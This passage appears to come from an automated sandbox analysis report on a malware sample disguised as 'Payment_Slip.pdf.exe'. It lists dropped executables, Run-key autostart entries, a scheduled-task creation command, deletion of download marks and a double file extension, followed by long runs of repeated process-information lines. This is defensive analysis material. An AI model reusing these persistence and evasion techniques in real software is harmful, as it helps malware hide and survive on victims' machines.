Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004063C6 ShellExecuteW,URLDownloadToFileW, 11_2_004063C6
Drops PE files
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Local\Temp\dwn.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Jump to dropped file
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Roaming\host.exe Jump to dropped file
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\host.exe File created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Jump to dropped file
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File created: C:\Users\user\AppData\Local\Temp\conserver.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Roaming\host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_00418A00
Source: C:\Users\user\AppData\Roaming\host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
Source: C:\Users\user\AppData\Roaming\host.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mykksg
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Update

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Roaming\host.exe File opened: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File opened: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe:Zone.Identifier read attributes | delete
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: Payment_Slip.pdf.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041A8DA
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
